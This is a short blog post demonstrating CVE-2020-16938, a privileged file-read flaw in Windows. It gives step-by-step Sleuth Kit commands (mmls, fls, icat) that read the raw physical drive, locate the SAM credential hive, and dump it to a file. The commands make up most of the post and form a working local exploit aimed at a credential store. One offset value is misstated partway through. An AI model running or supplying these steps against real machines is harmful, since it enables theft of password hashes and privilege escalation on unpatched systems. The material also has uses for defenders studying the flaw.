Monday, November 9, 2020

Privileged arbitrary file read (CVE-2020-16938) with The Sleuth Kit

After I read one of post from twitter which is about @jonasLyk's CVE-2020-16938 , I've some idea to do without using 7 zip file manager to read privileged files. And I remember about one of forensics tools for the files system which is called  "Sleuthkit".

I've little experience with that sleuthkit tool when I played some of CTF for the forensics. For this arb file read bug, I will use 3 tools which are mmlsfls and icat from sleuthkit. 

 The Sleuth Kit is a collection of command line tools and a C library that allows you to analyze disk images and recover files from them. It is used behind the scenes in Autopsy and many other open source and commercial forensics tools.

mmls : to displays the layout of the partitions in a volume system, which include partition tables and disk labels.

fls :  to lists the files and directory names in the image and can display file names of recently deleted files for the directory using the given inode. If the inode argument is not given, the inode value for the root directory is used. For example, on an NTFS file system it would be 5 and on a Ext3 file system it would be 2.

icat : to opens the named image(s) and copies the file with the specified inode number to standard output.

CVE-2020-16938: Privileged files could be read by opening the device volume. @jonasLyk used 7zip File Manager to read privileged files for the POC.

In this article, I will show that POC without using 7zip File Manager. 

For the first step,  check the volume system of  "\\.\PhysicalDrive0" partition with mmls.

C:\sleuthkit>mmls "\\.\PhysicalDrive0"


Then, you'll see 2 "Basic data partition" volumes and we need to take address of first one without taking frist 0000.  Address is 239616.  After this, we need to find the privileged file address that we want to read using fls and above offset address 239619.

C:\sleuthkit>fls -o 239616 -p -r \\.\physicaldrive0 | findstr /i "config/SAM"
-o 
        The sector offset where the file system starts in the image.
-p
        Display the full path for each entry. 
-r 
        Recursively display directories.

findstr command use for grepping the file name (SAM) that we want. Eg.  you can use file name with extension like  PrivilegedFile.txt.



Then, we will see the address of the file that we want to read. Address of SAM file is 78248 and we don't need to take -128-4. After we got the privileged file address, we can read that file with icat using those addresses.

C:\sleuthkit>icat -o 239616 \\.\physicaldrive0 78248



You can read privileged file directly on command prompt or can read via notepad using this command.

C:\sleuthkit>icat -o 239616 \\.\physicaldrive0 78248 > sam.txt



Boom !!!  you can read any privileged files on the windows system using this bug. 

Thanks for reading. Hope to enjoy it.






No comments:

Post a Comment

Privileged arbitrary file read (CVE-2020-16938) with The Sleuth Kit

After I read one of post from twitter which is about @jonasLyk's  CVE-2020-16938  , I've some idea to do without using 7 zip file ma...